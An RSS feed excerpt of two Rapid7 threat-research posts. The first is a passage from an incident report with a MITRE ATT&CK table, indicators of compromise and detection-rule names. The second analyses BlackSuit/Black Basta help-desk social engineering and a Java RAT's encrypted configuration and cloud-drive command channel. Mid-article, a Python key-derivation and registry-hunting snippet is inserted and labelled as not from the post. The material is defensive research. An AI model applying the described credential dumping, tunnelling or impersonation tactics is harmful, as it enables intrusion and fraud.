to discover information about accessible and valuable assets. A series of credential harvesting techniques granted access to further accounts with high permissions, and network tunnelling tools were installed to move through the environment. 
Cloudflared provided the attacker with the necessary framework to deploy further malware, culminating in the attempted execution of CS and malicious scripts associated with ransomware.</span></p><h2 style="direction: ltr;">MITRE ATT&CK techniques</h2><table><tbody><tr><td><p><strong>Tactic</strong></p></td><td><p><strong>Technique</strong></p></td><td><p><strong>Details</strong></p></td></tr><tr><td><p>Credential Access</p></td><td><p>Brute Force: Password Guessing (T1110.001)</p></td><td><p>PlusBrute brute-forced a series of Active Directory (AD) domain accounts</p></td></tr><tr><td><p>Credential Access</p></td><td><p>OS Credential Dumping (T1003)</p></td><td><p>Impacket, WinRAR, and FTK Imager collected credentials from registry hives</p></td></tr><tr><td><p>Command & Control</p></td><td><p>Protocol Tunneling (T1572)</p></td><td><p>Plink and Cloudflared tunnelled traffic to and from external C2 servers</p></td></tr><tr><td><p>Command & Control</p></td><td><p>Proxy: Internal Proxy (T1090.001)</p></td><td><p>Cloudflared directed C2 traffic between internal assets</p></td></tr><tr><td><p>Command & Control</p></td><td><p>Proxy: External Proxy (T1090.002)</p></td><td><p>Cloudflared obscured traffic between compromised assets and C2 infrastructure</p></td></tr><tr><td><p>Lateral Movement</p></td><td><p>Remote Services (T1021)</p></td><td><p>Cloudflared facilitated lateral movement through RDP and SSH</p></td></tr><tr><td><p>Defense Evasion</p></td><td><p>Hide Artifacts: File/Path Exclusions (T1564.012)</p></td><td><p>FTK Imager created exclusions to prevent antivirus software from hindering its usage</p></td></tr><tr><td><p>Defense Evasion</p></td><td><p>Hide Artifacts: Hidden Files and Directories (T1564.001)</p></td><td><p>Cloudflared set its directory as System and Hidden upon installation</p></td></tr><tr><td><p>Defense Evasion</p></td><td><p>Masquerading: Match Legitimate Resource Name or Location (T1036.005)</p></td><td><p>PlusBrute and Plink both renamed their 
main binaries to match common legitimate binaries</p></td></tr><tr><td><p>Execution</p></td><td><p>Command and Scripting Interpreter: PowerShell (T1059.001)</p></td><td><p>Encoded PowerShell attempted to establish a Cobalt Strike beacon</p></td></tr><tr><td><p>Execution</p></td><td><p>Command and Scripting Interpreter: Windows Command Shell (T1059.003)</p></td><td><p>CMD attempted to execute a ransomware deployment batch script</p></td></tr></tbody></table><h2 style="direction: ltr;">Indicators of compromise</h2><table><tbody><tr><td><p><strong>Attribute</strong></p></td><td><p><strong>Value</strong></p></td><td><p><strong>Description</strong></p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\brtewin.exe</p></td><td><p>Primary PlusBrute AD brute-forcing binary</p></td></tr><tr><td><p>SHA-256 Hash</p></td><td><p>b6a5780f74d960c9556c214a99d7539045a97294e16856d15c10d9b786e81ff3</p></td><td><p>SHA-256 hash for primary PlusBrute binary</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\p.txt</p></td><td><p>List of common passwords to use with PlusBrute in a brute-force attack</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\u.txt</p></td><td><p>List of common or known account names to use with PlusBrute</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Documents\bin\success.txt</p></td><td><p>List of successful username/password combinations identified by PlusBrute</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\VMpKZCrk.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\oywswwOi.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\oshmuUHZ.tmp</p></td><td><p>Randomly-named 
output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\ZJOSuwTO.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Windows\Temp\nZxQmsKN.tmp</p></td><td><p>Randomly-named output file associated with Impacket execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Desktop\Exterro_FTK_Imager.exe</p></td><td><p>Primary FTK Imager digital forensics binary abused for credential harvesting</p></td></tr><tr><td><p>SHA-256 Hash</p></td><td><p>443843a3923a55d479d6ebb339dfbec12b5c1aabed196bf0541669abbe9b1c51</p></td><td><p>SHA-256 hash for primary FTK Imager binary</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Downloads\plink_win64_20241022.zip</p></td><td><p>ZIP archive containing PuTTY Link (Plink) network tunnelling files</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Downloads\adobe.exe</p></td><td><p>Primary Plink binary renamed to mimic known legitimate software</p></td></tr><tr><td><p>SHA-256 Hash</p></td><td><p>11f661ed2bf9db45fa1222557f8e3a7b14f5cc51b2b3ef530e52d64551e33d0b</p></td><td><p>SHA-256 hash for primary Plink binary</p></td></tr><tr><td><p>IP Address</p></td><td><p>173.44.141[.]244</p></td><td><p>External C2 IP address directly referenced by Plink</p></td></tr><tr><td><p>IP Address</p></td><td><p>45.61.141[.]34</p></td><td><p>External C2 IP address directly referenced by Plink</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Users\&lt;redacted&gt;\Desktop\cloudflared.msi</p></td><td><p>Cloudflare Tunnel (Cloudflared) Windows installer file</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\Program Files (x86)\cloudflared\cloudflared.exe</p></td><td><p>Primary Cloudflared network tunneling and proxy binary</p></td></tr><tr><td><p>SHA-256 
Hash</p></td><td><p>f287dc99f9abe8f49510c78270b13fbb7a3fa0e22e53d1e061455a4d82901298</p></td><td><p>SHA-256 hash for primary Cloudflared binary</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\ProgramData\new.log</p></td><td><p>File referenced in PowerShell arguments of attempted Cobalt Strike execution</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\ProgramData\chi.log</p></td><td><p>File referenced in PowerShell arguments of attempted Cobalt Strike execution</p></td></tr><tr><td><p>IP Address</p></td><td><p>159.203.77[.]162</p></td><td><p>External C2 IP address encoded in the Cobalt Strike PowerShell command</p></td></tr><tr><td><p>Domain</p></td><td><p>rushpapers[.]com</p></td><td><p>Domain that the CS C2 IP address resolved to at the time of activity</p></td></tr><tr><td><p>Filename and Path</p></td><td><p>C:\ProgramData\1.bat</p></td><td><p>Batch script matching ransomware TTPs</p></td></tr></tbody></table><h2 style="direction: ltr;">Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 used </span><a href="https://www.rapid7.com/products/velociraptor/" target="_self"><span style='font-size: undefined;'>Velociraptor</span></a><span style='font-size: undefined;'> during this investigation to allow for remote triage and collection of forensic artifacts on the endpoint. Velociraptor can be leveraged for hunting IoCs at scale; refer to the Rapid7 Labs repository </span><a href="https://github.com/rapid7/Rapid7-Labs/tree/main/Vql" target="_self"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'> for IoCs and additional rule logic that can be applied.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. 
Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Below is a non-exhaustive list of detections that are deployed and will alert on the behaviors discussed in this blog:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process — SMB Activity Spike over Cloudflared Tunnel (cloudflared.exe)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process — RDP Session over New Cloudflared Tunnel (cloudflared.exe)</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker Technique — Plink Redirecting RDP</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker Technique — Plink Redirecting SMB/CIFS</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Lateral Movement — SSH Connection to Remote IP using Plink.exe</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Endpoint Detection — Registry Dump File Written to TEMP Directory</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Credential Dumping — Reg.exe Exporting Security, System or SAM Registry Keys</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Brute Force — Failed Authentication Attempts Against Domain Account</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>PowerShell — Base64/Gzip Script Content</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Collection — WinRAR Multi Filter 
Archive</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Attacker Technique — Suspicious Nltest Execution via RDP</span></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/innovative-tunnelling-and-forensic-tool-abuse-ir-tales-from-the-field</link>
      <guid isPermaLink="false">blt91720d4370e02a2b</guid>
      <category><![CDATA[Incident Response]]></category>
      <category><![CDATA[Detection and Response]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 14 Jul 2025 14:08:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltb655c1b69f13c73b/6846a711536b63f12ca5f649/incident-response-findings-2025.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[BlackSuit Continues Social Engineering Attacks in Wake of Black Basta’s Internal Conflict]]></title>
      <description><![CDATA[<h2>Executive Summary</h2><p>There has been a significant decrease in social engineering attacks linked to the Black Basta ransomware group since late December 2024. This period also saw the <a href="https://github.com/D4RK-R4BB1T/BlackBasta-Chats/">leak of Black Basta chat logs in February 2025</a>, indicating internal conflict within the group. Despite this, Rapid7 has observed sustained social engineering attacks. Evidence now suggests that BlackSuit affiliates have either adopted Black Basta’s strategy or absorbed members of the group. The developer(s) of a previously identified Java malware family, distributed during social engineering attacks, have now been assessed as likely initial access brokers, having potentially provided historical access for Black Basta and/or FIN7 affiliates.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt412b8856b67fb99c/684c3af344bc4a205ca88a7c/blog-confirmed-malicious-chat-requests.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-confirmed-malicious-chat-requests.png" asset-alt="blog-confirmed-malicious-chat-requests.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt412b8856b67fb99c/684c3af344bc4a205ca88a7c/blog-confirmed-malicious-chat-requests.png" data-sys-asset-uid="blt412b8856b67fb99c" data-sys-asset-filename="blog-confirmed-malicious-chat-requests.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-confirmed-malicious-chat-requests.png" sys-style-type="display"/><p><em>Figure 1. Confirmed malicious chat requests, Feb 12 through May 7, as observed by Rapid7.</em></p><h2>Overview</h2><p>The first stage of the attack remains the same. The operator will flood targeted users with a high volume of emails, on the order of thousands per hour. 
This is often accomplished by signing the target user’s email address up to many different publicly available mailing lists at once, effectively creating a denial-of-service attack when each service sends a welcome email. This technique is commonly known as an email bomb.</p><p>Following the email bomb, the strategy then splits between operators, though they all ultimately reach out to impacted users pretending to be a member of the targeted organization’s help desk. The majority of operators still perform this step via Microsoft Teams using either a default Azure/Entra tenant (i.e., an email account ending in <span data-type='inlineCode'>onmicrosoft[.]com</span>) or their own custom domain. In rare cases, however, operators, particularly those affiliated with BlackSuit, may forgo Microsoft Teams in favor of calling the targeted users directly from a spoofed number. This strategy, if successful, allows them to circumvent the cloud logging that would otherwise be recorded. For the first time, an explanation of the process written by Black Basta’s leader is also available, in the context of walking a new affiliate through the attack:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5025df00dffa3e89/684c3af26a67a9de725a3bdc/blog-chat-logs.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs.png" asset-alt="blog-chat-logs.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5025df00dffa3e89/684c3af26a67a9de725a3bdc/blog-chat-logs.png" data-sys-asset-uid="blt5025df00dffa3e89" data-sys-asset-filename="blog-chat-logs.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs.png" sys-style-type="display"/></p><p><em>Figure 2. Black Basta’s leader explains the social engineering attack. 
Additional chat logs with translations are </em><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/IOCs/blacksuit_socialengineering/bbchat1.txt"><em>available at the Rapid7 GitHub repository</em></a><em></em></p><p>If the affiliate is able to gain the user’s confidence, they will still primarily attempt to gain access to the user’s asset — and thereby the corporate network — via Quick Assist. Quick Assist is a built-in Windows utility that allows a user to easily grant remote access to their computer to a third party. The utility has been widely abused for social engineering attacks, a trend which continues. BlackSuit affiliates in particular may also direct the user to a malicious domain that hosts a fake Quick Assist login page, for the purpose of harvesting their credentials.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7ad72422c5d03e7/684c3af2950a571891af0a65/blog-ms-login.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-ms-login.png" asset-alt="blog-ms-login.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd7ad72422c5d03e7/684c3af2950a571891af0a65/blog-ms-login.png" data-sys-asset-uid="bltd7ad72422c5d03e7" data-sys-asset-filename="blog-ms-login.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-ms-login.png" sys-style-type="display"/></p><p><em>Figure 3. 
Fake Quick Assist login page, which functions as a credential harvester.</em></p><p>In cases where the affiliate is unable to get Quick Assist to work, they will still cycle through a variety of other popular remote access tools (e.g., AnyDesk, ScreenConnect), and if that still doesn’t work, they may simply hang up on the user and move on to the next target.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt31adcfe358e4991e/684c3af2343886387b2ceed5/blog-chat-logs-2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-2.png" asset-alt="blog-chat-logs-2.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt31adcfe358e4991e/684c3af2343886387b2ceed5/blog-chat-logs-2.png" data-sys-asset-uid="blt31adcfe358e4991e" data-sys-asset-filename="blog-chat-logs-2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-2.png" sys-style-type="display"/><p><em>Figure 4. One of Black Basta’s operators discusses their strategy regarding remote access tools.</em></p><p>Black Basta had at least one caller template/script for this purpose:</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2691246333c44510/684c3af23ef1e75ef7697bf0/blog-chat-logs-3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-3.png" asset-alt="blog-chat-logs-3.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2691246333c44510/684c3af23ef1e75ef7697bf0/blog-chat-logs-3.png" data-sys-asset-uid="blt2691246333c44510" data-sys-asset-filename="blog-chat-logs-3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-3.png" sys-style-type="display"/><em>Figure 5. A call script used by Black Basta’s operators. 
The full script is </em><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/IOCs/blacksuit_socialengineering/bbchat_call_script.txt"><em>available at the Rapid7 GitHub repository.</em></a><em></em></p><p></p><p>Quickly obtaining reliable access to the target network is still the top priority in the early stages of the attack, typically facilitated by stealing the targeted user’s credentials. In the past this has been achieved, for example, via a QR code sent to the target user via Microsoft Teams or the download and execution of malware which creates a fake Windows authentication prompt.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt98e0c324fe9ac0df/684c3af25bb3f86152a3b2df/blog-chat-logs-4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-logs-4.png" asset-alt="blog-chat-logs-4.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt98e0c324fe9ac0df/684c3af25bb3f86152a3b2df/blog-chat-logs-4.png" data-sys-asset-uid="blt98e0c324fe9ac0df" data-sys-asset-filename="blog-chat-logs-4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-logs-4.png" sys-style-type="display"/><em></em><p><em>Figure 6. One of Black Basta’s operators discusses the usage of QR codes for credential harvesting.</em></p><p>In some cases the operator who makes the initial call may also coerce the target user to provide an MFA code while still on the phone. 
Historically, operators have also attempted to steal VPN configuration files once remote access is established, which can allow them to authenticate directly to the network if the compromised user account is not remediated.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta12b1e32812beda6/684c3af22847d348c3b10711/blog-chat-log-5.png" height="143" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-log-5.png" asset-alt="blog-chat-log-5.png" inline="true" width="428" max-width="428" max-height="143" style="max-width: 428px; width: 428px; max-height: 143px; height: 143px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta12b1e32812beda6/684c3af22847d348c3b10711/blog-chat-log-5.png" data-sys-asset-uid="blta12b1e32812beda6" data-sys-asset-filename="blog-chat-log-5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-log-5.png" sys-style-type="display"/><p><em>Figure 7. One of Black Basta’s operators discusses using stolen credentials to authenticate directly to the VPN for the targeted environment.</em></p><p>After the affiliate has successfully gained access, they will typically transfer and execute malware on the compromised system. The specific malware differs per operator and typically marks the stage in which the access is passed from the caller to an operator within the group who specializes in what they refer to as “pentesting.” To facilitate the access, the operator who calls typically coordinates with the “pentester” to increase the chances of success. At this point in the attack, the affiliate who called the user has already hung up under the guise of having fixed the spam problem, and the “pentester” then begins to enumerate the environment. 
Rapid7 has commonly observed <a href="https://attack.mitre.org/techniques/T1558/004/">AS-REP roasting</a> and <a href="https://attack.mitre.org/techniques/T1558/003/">Kerberoasting</a> attacks at this stage, along with Active Directory Certificate Services (ADCS) abuse and other types of brute-force password attacks.</p><h2>Technical Analysis</h2><p>After initial access has been achieved, the follow-on malware payloads that are downloaded to the compromised system and executed differ per operator.</p><h3>Java RAT</h3><p>A large volume of social engineering incidents handled by Rapid7 have resulted in a Java RAT being downloaded and executed. This tactic was first observed by Rapid7 during October of 2024, and <a href="https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign-drops-zbot-darkgate-and-custom-malware/">initially reported on in December 2024</a> in relation to the payload <span data-type='inlineCode'>identity.jar</span>. The first samples of the Java RAT observed by Rapid7 only utilized Microsoft OneDrive, with optional proxy servers (e.g., SOCKS5) for a more direct C2 connection. The configuration was left in plain text and did not contain any functionality to dynamically update or encrypt the configuration; the malware primarily functioned only as a RAT via PowerShell session commands.</p><p>In the past 6+ months, development of the Java malware payload has continued, adding and changing numerous features. The Java malware now abuses cloud-based file hosting services provided by both Google and Microsoft to proxy commands through the respective cloud service provider’s (CSP) servers. Over time, the malware developer has shifted away from direct proxy connections (i.e., the config option is left blank or not present), towards OneDrive and Google Sheets, and most recently, towards simply using Google Drive. 
The logic of the RAT is obfuscated using various types of junk code, control flow obfuscation, and string obfuscation in an attempt to impede analysis.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9b92ee829f79635/684c3afe5d16435292ae8190/blog-chat-log-6.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-log-6.png" asset-alt="blog-chat-log-6.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9b92ee829f79635/684c3afe5d16435292ae8190/blog-chat-log-6.png" data-sys-asset-uid="bltd9b92ee829f79635" data-sys-asset-filename="blog-chat-log-6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-log-6.png" sys-style-type="display"/><p><em>Figure 8. Obfuscated logic within the Java RAT, where three simple statements become dozens of lines and indentations.</em></p><p>The Java RAT and other payloads are distributed within an archive, the link for which is most often sent to the target user via a <span data-type='inlineCode'>pastebin[.]com</span> link. In cases as recent as May of 2025, Rapid7 has observed that the archives are still being publicly hosted on potentially compromised SharePoint instances. The archive and the payloads within are named to fit the initial social engineering lure. For example, in a recent incident, the archive was named <span data-type='inlineCode'>Email-Focus-Tool.zip</span>, likely to help prevent suspicion by the targeted user during the attack. 
The archive contains a <span data-type='inlineCode'>.jar</span> file (the Java RAT), a copy of the required JDK dependencies in a child folder, and at least one <span data-type='inlineCode'>.lnk</span> file intended to make the malware easy to execute.</p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta21c4b18282d384c/684c3afebe25df2c0c4e2c92/blog-chat-log-7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-chat-log-7.png" asset-alt="blog-chat-log-7.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta21c4b18282d384c/684c3afebe25df2c0c4e2c92/blog-chat-log-7.png" data-sys-asset-uid="blta21c4b18282d384c" data-sys-asset-filename="blog-chat-log-7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-chat-log-7.png" sys-style-type="display"/><p><em>Figure 9. The contents of an archive delivered by the threat actor and a <span data-type='inlineCode'>log.txt</span> file containing enumeration command output.</em></p><p>The archive is most often extracted to the staging directory <span data-type='inlineCode'>C:\ProgramData\</span> prior to execution. In at least one case, Rapid7 has also observed the operator who initiated the attack writing system enumeration output to a plaintext file in the same directory, a technique commonly used in the past by Black Basta. Historically, this is information that they share during the initial stages of the attack to assess the network and the type of defenses they may have to deal with. 
For example, shown above, the operator who initially accessed the compromised asset spawned a command prompt and redirected the output of the <span data-type='inlineCode'>ipconfig /all</span> and <span data-type='inlineCode'>tasklist</span> commands to the file <span data-type='inlineCode'>log.txt</span>.</p><p>Most recent versions of the Java RAT have the capability to use Google Sheets to dynamically update the stored C2 configuration, which includes a Google spreadsheet ID (SSID), proxy server IPv4 addresses, application credentials (OneDrive), and/or service account credentials (Google Drive). At least one of the Google Spreadsheets used in this way was observed by Rapid7 to have been taken down by Google, which highlights the potential unreliability of using certain cloud services as a malware traffic proxy.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcabd56d810929919/684c3ee23e700fcd056dc2d5/google-spreadsheet.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="google-spreadsheet.png" asset-alt="google-spreadsheet.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltcabd56d810929919/684c3ee23e700fcd056dc2d5/google-spreadsheet.png" data-sys-asset-uid="bltcabd56d810929919" data-sys-asset-filename="google-spreadsheet.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="google-spreadsheet.png" sys-style-type="display"/><p><em>Figure 10. A Google spreadsheet used by the malware for dynamic configuration updates was taken down by Google.</em></p><p>One of the first actions taken by the malware on launch is to check for an existing configuration in the user’s registry, and if it is not already present, the copy included within the <span data-type='inlineCode'>.jar</span> payload, contained within the file <span data-type='inlineCode'>config.json</span>, is written there. 
None of the samples analyzed by Rapid7 had their debugging messages removed; because every debug message is written to stdout, they can be viewed by simply executing the <span data-type='inlineCode'>.jar</span> file in a console window.</p><p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f24a7659026b9be/684c3afe4a1597ebc2db69b5/blog-code.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-code.png" asset-alt="blog-code.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f24a7659026b9be/684c3afe4a1597ebc2db69b5/blog-code.png" data-sys-asset-uid="blt5f24a7659026b9be" data-sys-asset-filename="blog-code.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-code.png" sys-style-type="display"/></p><p><em>Figure 11. Debug statement output after executing the Java RAT via console.</em></p><p>The registry value name(s) and content for the stored config are both base64 encoded (e.g., <span data-type='inlineCode'>HKCU\SOFTWARE\FENokuuTCyVq\JJSUP0CEcUw9PENaNduhsA==</span>), with the decoded configuration content being encrypted using AES-256-ECB. The encryption key is derived from a seed that is stored as a 16-byte string within a file named <span data-type='inlineCode'>ek</span> (encryption key) inside the <span data-type='inlineCode'>.jar</span> archive. The registry key name, a randomized alphabetic string, is hard coded and stored in a similar manner within the file <span data-type='inlineCode'>r_path</span> (registry path). The malware creates a SHA256 hash of the encryption key seed string, and the first 32 bytes of the SHA256 hash are then used as the AES-256-ECB key to encrypt and decrypt the malware’s configuration.
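</p><p>As an added example, not code from the post or from Rapid7, the following Python shows the two pieces of the configuration storage just described from a responder's side: the key derivation the RAT performs (SHA-256 over the seed string), and a hunting heuristic over exported HKCU\SOFTWARE values that flags keys whose leaf name is a random-looking alphabetic string and whose value has a base64 name and base64 data decoding to whole 16-byte AES blocks. The sample registry records and the mixed-case and length thresholds are this example's own assumptions; a hit is a lead for manual review, not a verdict.</p>

```python
import base64
import binascii
import hashlib
import re

# Constructed registry records (key path, value name, value data), modelled on the
# layout described in the post: HKCU\SOFTWARE\random-alphabetic-key\base64-name = base64-data.
# Placeholders built for this example; nothing here was recovered from a real host.
SAMPLE_VALUES = [
    ("HKCU\\SOFTWARE\\AbCdEfGhIjKl",
     base64.b64encode(b"\x01" * 16).decode(),        # 16-byte value name
     base64.b64encode(b"\x00" * 48).decode()),       # three whole AES blocks of "ciphertext"
    ("HKCU\\SOFTWARE\\Microsoft\\Windows", "ShellState", "0x0000"),
    ("HKCU\\SOFTWARE\\Notepad++", "Path", "C:\\Program Files\\Notepad++"),
    ("HKCU\\SOFTWARE\\qWErtyUIopAs", "Zm9v", "bm90YWJsb2Nr"),   # valid base64, but 9 bytes: not block-aligned
]


def derive_config_key(seed: str) -> bytes:
    """Key derivation as the post describes it: SHA-256 over the seed string from the
    'ek' resource. The digest is exactly 32 bytes, so "the first 32 bytes" is the whole
    digest, which is the AES-256 key size."""
    return hashlib.sha256(seed.encode("utf-8")).digest()


def _b64_strict(text: str):
    """Return decoded bytes only if text is canonical base64, otherwise None."""
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None


# Heuristic thresholds below are this example's assumptions, not values from the post.
ALPHA_RE = re.compile(r"^[A-Za-z]{8,20}$")


def random_alpha_name(leaf: str) -> bool:
    """Random alphabetic key names like the one in the post mix cases freely; require
    several upper- and several lower-case letters so ordinary vendor keys do not match."""
    if not ALPHA_RE.match(leaf):
        return False
    upper = sum(c.isupper() for c in leaf)
    lower = len(leaf) - upper
    return upper >= 3 and lower >= 3


def looks_like_rat_config(key_path: str, value_name: str, value_data: str) -> bool:
    leaf = key_path.rsplit("\\", 1)[-1]
    if not random_alpha_name(leaf):
        return False
    name = _b64_strict(value_name)
    data = _b64_strict(value_data)
    if name is None or data is None:
        return False
    # AES-ECB output is a whole number of 16-byte blocks; anything else is not this config.
    return len(data) > 0 and len(data) % 16 == 0


def hunt(records):
    """Return (key path, value name) for every record matching the heuristic."""
    return [(k, v) for k, v, d in records if looks_like_rat_config(k, v, d)]
```

<p>Run <span data-type='inlineCode'>hunt()</span> over a registry export of HKCU\SOFTWARE taken from a suspect host; with the seed recovered from the sample's <span data-type='inlineCode'>ek</span> resource, <span data-type='inlineCode'>derive_config_key()</span> gives the key needed to decrypt a flagged value's contents.</p><p>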
Every sample analyzed by Rapid7 contained a unique key seed, though a particular sample is often distributed (within the related archive) to multiple targets for an extended period of time, often around a couple of weeks.</p><p>After checking and loading the configuration from the registry, local resource, or updated configuration, the RAT will then establish at least one PowerShell session.</p><em></em><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9cb13c5fe9958c6/684c3f736bd1c8839aeb2acc/blog-folders.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-folders.png" asset-alt="blog-folders.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd9cb13c5fe9958c6/684c3f736bd1c8839aeb2acc/blog-folders.png" data-sys-asset-uid="bltd9cb13c5fe9958c6" data-sys-asset-filename="blog-folders.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-folders.png" sys-style-type="display"/><p><em>Figure 12. Example process tree for the Java RAT.</em></p><p>The stdin and stdout for the PowerShell console are used to process remote commands. The commands sent to the Java RAT are proxied through the respective CSP by the malware creating two specific files within the cloud drive. The names of the files all contain the UUID of the infected asset, which is retrieved at the malware’s startup. There are two prefixes added onto the primary communication files, <span data-type='inlineCode'>cf_</span> and <span data-type='inlineCode'>rf_</span>, which contextually appear to stand for create file and receive file, respectively. These two files correspond to the standard output (stdout) and standard input (stdin) of the PowerShell console. The malware uses the input file in two major ways.
